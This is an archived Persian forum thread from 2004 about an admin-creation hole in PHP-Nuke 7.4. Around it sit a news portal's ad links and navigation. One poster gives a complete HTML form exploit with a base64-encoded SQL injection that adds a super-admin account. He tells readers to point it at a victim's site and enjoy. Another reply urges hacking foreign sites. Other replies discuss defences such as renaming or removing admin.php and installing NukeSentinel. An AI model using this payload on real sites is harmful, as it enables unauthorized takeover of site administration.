تور لحظه آخری
امروز : شنبه ، 3 آذر 1403    احادیث و روایات:  امام علی (ع):روزه ماه شعبان، وسواس دل و پريشانى‏هاى جان را از بين مى‏برد.
سرگرمی سبک زندگی سینما و تلویزیون فرهنگ و هنر پزشکی و سلامت اجتماع و خانواده تصویری دین و اندیشه ورزش اقتصادی سیاسی حوادث علم و فناوری سایتهای دانلود گوناگون شرکت ها

تبلیغات

تبلیغات متنی

صرافی ارکی چنج

صرافی rkchange

سایبان ماشین

دزدگیر منزل

تشریفات روناک

اجاره سند در شیراز

قیمت فنس

armanekasbokar

armanetejarat

صندوق تضمین

Future Innovate Tech

پی جو مشاغل برتر شیراز

لوله بازکنی تهران

آراد برندینگ

خرید یخچال خارجی

موسسه خیریه

واردات از چین

حمية السكري النوع الثاني

ناب مووی

دانلود فیلم

بانک کتاب

دریافت دیه موتورسیکلت از بیمه

طراحی سایت تهران سایت

irspeedy

درج اگهی ویژه

تعمیرات مک بوک

دانلود فیلم هندی

قیمت فرش

درب فریم لس

زانوبند زاپیامکس

روغن بهران بردبار ۳۲۰

قیمت سرور اچ پی

خرید بلیط هواپیما

بلیط اتوبوس پایانه

قیمت سرور dl380 g10

تعمیرات پکیج کرج

لیست قیمت گوشی شیائومی

خرید فالوور

بهترین وکیل کرج

بهترین وکیل تهران

خرید اکانت تریدینگ ویو

خرید از چین

خرید از چین

تجهیزات کافی شاپ

نگهداری از سالمند شبانه روزی در منزل

بی متال زیمنس

ساختمان پزشکان

ویزای چک

محصولات فوراور

خرید سرور اچ پی ماهان شبکه

دوربین سیمکارتی چرخشی

همکاری آی نو و گزینه دو

کاشت ابرو طبیعی و‌ سریع

الک آزمایشگاهی

الک آزمایشگاهی

خرید سرور مجازی

قیمت بالابر هیدرولیکی

قیمت بالابر هیدرولیکی

قیمت بالابر هیدرولیکی

لوله و اتصالات آذین

قرص گلوریا

نمایندگی دوو در کرج

خرید نهال سیب

وکیل ایرانی در استانبول

وکیل ایرانی در استانبول

وکیل ایرانی در استانبول

 






آمار وبسایت

 تعداد کل بازدیدها : 1832569027




هواشناسی

نرخ طلا سکه و  ارز

قیمت خودرو

فال حافظ

تعبیر خواب

فال انبیاء

متن قرآن



اضافه به علاقمنديها ارسال اين مطلب به دوستان آرشيو تمام مطالب
archive  refresh

كساني كه nuke7.4 دارند حتما بخونند (خيلي مهم) -


واضح آرشیو وب فارسی:سایت ریسک: t=18164">كساني كه nuke7.4 دارند حتما بخونند (خيلي مهم) nasser110 17 شهريور 1383, 00:19سلام آقا نمي دونم اطلاع داريد يا نه تو سايت مشهد تيم هم اين موضوع رو گفته و همين طور سايت سيمرغ روس هك سايت هاي با ناك 7.4 رو گفته ، با اين روش هر كسي مي تونه يه يوزر با حق دسترسي مدير ايجاد كنه و كاملا رو ناك شما مديريت كنه ، ظاهرا هنوز پتچ امنيتي اراپه نشده ولي راه پيش نهادي من براي هك نشدن هيچ ناكي اين است : فايل Admin.php رو به مثلا Admin128 تغيير بديد و البته بايد اين تغيير رو روي تمام ماژولها اجرا كنيد ، يه كم وقت گيره ولي رد خور نداره حتما اينكارو بكنيد تا ناكتون هك نشه :wink: مرسي باي ara 17 شهريور 1383, 00:34آقا با كدوم روش ؟؟ ميشه روشش هم را بگي ؟ mosi-online 17 شهريور 1383, 01:26يعني اينكه هرچي admin.php داريم اسمش رو رينيم كنيم به admin128.php آره؟ nasser110 17 شهريور 1383, 08:55سلام اينم روشش : اين كد رو در يه فايل html كپي كنيد : <html> <head> <meta "Content-Type" content="text/html; charset=windows-1252"> </head> <body> <form name="mantra" method="POST" action=";//"> <input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox"> <input type="hidden" name="add_radminsuper" value="1"> <input type="hidden" name="op" value="AddAuthor"> <p>USERNAME: <input type="text" name="add_aid" size="20"> <br> NOME: <input type="text" name="add_name" size="20"> <br> PASSWORD: <input type="text" name="add_pwd" size="20"> <br> E-MAIL: <input type="text" name="add_email" size="20"> </p> <p> <input type="submit" name="Submit" value="Create Admin"> <br> </p> </form> </body> </html> به جاي yor site آدرس اون سايت بد بخت رو بديد ، و بريزيد رويه يه هاست و اجراش كنيد و حالشو ببريد آره فايل admin خودتون رو تغيير نام بديد با ور كنيد ديگه اصلا هك نميشيد :wink: باي swi 17 شهريور 1383, 09:33آقا از كجا بايد بدوني ورژن ناك يك سايت چنده guilanict 17 شهريور 1383, 12:59 هك را تجربه كنيد اما لطفا سايتهاي خارجي. :) nasser110 17 شهريور 1383, 13:14سلام مرسي از معرفي پچ :wink: swi 17 شهريور 1383, 13:20كسي جواب منو نميدونه ؟ guilanict 17 شهريور 1383, 13:23مرسي از شما كه خبر دادي . من واسه امتحان سايت خودمو هك كردم و كيف كردم. :) اين پچ فكر كنم ربطي به اين حفره نداشته باشه. :) devilscholar 17 شهريور 1383, 16:08چرا ديگه - ربط داره! اگه دقت كني اول اين روش آدرس admin.php رو ميخواد!!! اگه تغيير نام بدي ! ديگه نميشه كه! guilanict 17 شهريور 1383, 16:28اما خودمونيما روش خيلي راحت و بيدردسريه ها. اما اينم بگم ادمين سكيور داشته باشي مشكلي نخواهي داشت. sarallah 17 شهريور 1383, 17:17guilanict جان يه بار از قسمت مديريت logout كن ٬ بعد امتحان كن ببين بازم ميشه :wink: nasser110 17 شهريور 1383, 21:18سلام خواهش مي كنم آقا كاري به سيستم ادمين سكيور نداره و هر كي ناكش 7.4 باشه و Admin.php رو بر نداره از روي هاستش حتما هك ميشه فقط هر وقت نياز داشتيد ، admin.php رو آپلود كنيد و يا اينكه تغيير نامش بديد كه البته بايد كامل همه ماژولها رو تغيير نام بديد ، بهترين راه فعلا اينه كه admin.php رو بر داريد . :wink: مرسي sana 159263 17 شهريور 1383, 23:40اقا خيلي از سايتها با اين روش هك نميشه فايلها هم سر جاشه mosi-online 18 شهريور 1383, 00:21من كه اول دارم رو سايت خودم تست ميكنمش... :D:D:D:D Dark Man 18 شهريور 1383, 05:00سايت منو با همين روش هك كردن!حالا بايد چيكار كنم!!؟؟ guilanict 18 شهريور 1383, 07:08ثارالله جان مرسي عزيز اما منظورم اين نبود كه سايتم هك شده بلكه خودم تست كردم و ديدم حواب مي ده. من سطح دسترسي رو عوض كرده ام. باز هم مرسي guilanict 18 شهريور 1383, 07:11dark man عزيز در اين روش يك مدير ساخته مي شود و شما مي تواني براحتي آن را حذف كني مگر طرف وارد باشه و خودشو تبديل به god كرده باشه. البته اون هم از طريق سي پنل قابل حذف است. guilanict 18 شهريور 1383, 07:57شما مي تونيد فايل authors.php را در بخش ماژولهاي ادمين تغيير نام بديد و فقط مواقعي كه خواستيد مدير كم و زياد كنيد اسمشو برگردونيد. من اينو تست كردم و جواب ميده. sasan4u 18 شهريور 1383, 09:03سلام بجاي تغيير نام يا حذف فايلها راههاي امنيتي رو براي مخفي نگه داشتن مدير ناك از اينجا بخونيد از زبان مدير پروژه ادمين سكيور در حال ترجمه سيستم حفاظت از ناك جديدي هستم nuke sentinel نگهبان ناك كه در نظر سنجي سايت پليس هاي ناك nukecops.com (نظر سنجي در صفحه اول سايت است سمت راست) بيشترين راي رو با اختلاف فاحشي نسبت به سيستم هاي حفاظتي ديگه ناك اورده در اين راي گيري ادمين سكيور در رتبه سومه نگهبان ناك از امكانات ipban ويرايش جديد بخوبي استفاده مي كنه و به راحتي رو 7.5 هم قابل نصبه كار ترجمه تست و نوشتن راهنماي فارسي اون قدر ي وقت گيره و فكر نكنم فرصت بشه در ترجمه ناك كمك كنم احتمالا همزمان با اتمام ناك فارسي جديد كار نگهبان ناك هم تمام مي شه و از اونجايي كه مثل يك ماژول داخليه ناك است مي شه همراه با ناك جديد ارايه كرد اين مسله از انجا مهمه كه چند سايت ناك 7.3 كه ادمين سكيور روي اونها نصب بوده هكرها تونستن از بيرون مدير ناك ماژولها رو غير فعال كنن شايد يكي از دلايل اينكه در ورژن جديد اكثر ماژولها بخش ادمين دارن همين نقطه ضعف بوده در اين نظر سنجي آخرين گزينه ديگر روش هاست اين ديگر روشهاي دستي تغيير ناكه و تبديل اون از يك برنامه همگاني به برنامه اي كه خصوصي مي شه و به راحتي نمي شه هكش كرد اصولا اين 5 سيستم حفاظتي ناك كلاسه شده و تكميل و آسون شده همين روشهاي دستي و از اينجا به وجود اومده و هنوز هم در اين سيستم هاي حفاظتي براي اينكه كار كنن بايد قسمتهايي از فايلهاي اصلي ناك رو تغيير داد تركيب بهترين سيستم امنيتي ناك و روشهاي دستي ناكي ايجاد مي كنه كاملا امن و شما وقتي اين تغييرات دستي رو در ناك مي دين بدون نياز به ارتقا اون مي تونيد ماهها بدون ترس از هك شدن به كارهاي سايتتون بپردازيد الان سايت هاي ناكي مي شناسم كه با ورژن 6.5 البته نه نسخه محمد امين چون محمد در ديتابيس ناك دستكاري كرده بود كار مي كنن و بدليل همين تغييرات دستي سيستم دفاعي اونها بهتر از جديدترين محافظين ناك كار مي كنن ( حضور دوباره محمد در سايت را تبريك مي گم اميدورام موفق باشه) مشكل ديگه اي كه استفاده كنندگان ناك فارسي دارن اينه بسياري از ناك هاي فارسي موجود در هنگام فارسي سازي ديتابيس ناك رو دستكاري مي كنن يعني اگه شما از ناك فارسي غير استاندارد با ديتا بيسي كه در هنگام فارسي سازي دستكاري شده بخواهيد تغييرات دستي روي ناك اعمال كنيد و ماهها به اين حالت بمونه و بعد بخواين بعد از يكسال ناك رو به ورژن جديدي كه كس ديگه اي فارسي كرده ارتقا بدين ديتابيس هاي اين ناك هاي فارسي به هم نمي خوره تنها راهش اينه كه از ناك هاي فارسي استفاده كنيد كه توصيه شده و به عنوان ورژن استاندارد معرفي شده ناك 7.3 ثاراله ناك 7.4 نارنج دات كام و ناك 7.5 كه بزودي خواهد امد و به گفته ثاراله در ديتابيس دخل و تصرف نمي شه همچنين وقتي از ناكهاي استاندارد استفاده كنيد يعني ديتابيس اصلي و دستكاري نشده ناك و همزمان از سيستم امنيتي استفاده مي كنيد از بك آپ هاي ديتابيس كه مي گيريد مي تونيد استفاده كنيد و در مورد ديتابيس هاي دستكاري شده وقتي سيستم حفاظتي رو ناك نصب مي شه از بك آپ ديتابيس نمي شه استفاده كرد بهترين كمكي كه شما مي تونيد بكنيد اينه كه اين راهي كه madman مدير پروژه ادمين سكيور كه تنبليش گرفته و ادمين سكيور رو ارتقا نمي ده اما اومده راه حل ارايه مي ده رو براي اين حفره ناك 7.4 امتحان كنيد ببينيد چطوره يه گشتي هم تو فاروم security بزنيد چيزهاي خوب پيدا كنيد هر وقت مشكل امنيتي پيدا شد بهترين مرجع تالارگفتگوي سايت پليس هاي ناكه اصلا يك پروژه تعريف مي كنيم پروژه امنيت ناك و اگه دوست دارين در پروژه امنيت ناك شركت كنيد به سايت پليس هاي ناك سر بزنيد و چيزهاي خوب اونجا پيدا كنيد guilanict 18 شهريور 1383, 09:31ضمن تشكر از توضيحاتتان اين حفره براحتي سيستمهاي ناك رو هك مي كنه و فكر نمي كنم دوستان حاضر باشن تا اتمام فارسي سازي سيستمهاي امنيتي مورد نظرتان دست روي دست بگذارند و شاهد هك شدن سايتشان باشند. منظور من و برخي دوستان از ارايه راه حلهاي بالا تنها كمك فوري به جلوگيري از اين حفره است كه حتي يك بچه هم مي تواند با ان سايت را هك كند. و هيچ يك از ما قصد چاه كني نداريم. فكر كنم بهتره در اظهارنظرها زياد تند نريم. مرسي sasan4u 18 شهريور 1383, 10:26ضمن تشكر از توضيحاتتان اين حفره براحتي سيستمهاي ناك رو هك مي كنه و فكر نمي كنم دوستان حاضر باشن تا اتمام فارسي سازي سيستمهاي امنيتي مورد نظرتان دست روي دست بگذارند و شاهد هك شدن سايتشان باشند. منظور من و برخي دوستان از ارايه راه حلهاي بالا تنها كمك فوري به جلوگيري از اين حفره است كه حتي يك بچه هم مي تواند با ان سايت را هك كند. و هيچ يك از ما قصد چاه كني نداريم. فكر كنم بهتره در اظهارنظرها زياد تند نريم. مرسي اصلا بخاطر همين بود كه اينجا نوشتم وگرنه مي رفتم يه تاپيك ديگه حرف من اينه شما كه علاقمندين به امنيت ناك به سايت پليس هاي ناك سر بزنين راه حل هاي اونجا رو ببينين و راههاي بهتري رو به ديگران توصيه كنيد از بايت اينكه گفتم چاهنمايي عذرخواهي مي كنم




این صفحه را در گوگل محبوب کنید

[ارسال شده از: سایت ریسک]
[مشاهده در: www.ri3k.eu]
[تعداد بازديد از اين مطلب: 449]

bt

اضافه شدن مطلب/حذف مطلب







-


گوناگون

پربازدیدترینها
طراحی وب>


صفحه اول | تمام مطالب | RSS | ارتباط با ما
1390© تمامی حقوق این سایت متعلق به سایت واضح می باشد.
این سایت در ستاد ساماندهی وزارت فرهنگ و ارشاد اسلامی ثبت شده است و پیرو قوانین جمهوری اسلامی ایران می باشد. لطفا در صورت برخورد با مطالب و صفحات خلاف قوانین در سایت آن را به ما اطلاع دهید
پایگاه خبری واضح کاری از شرکت طراحی سایت اینتن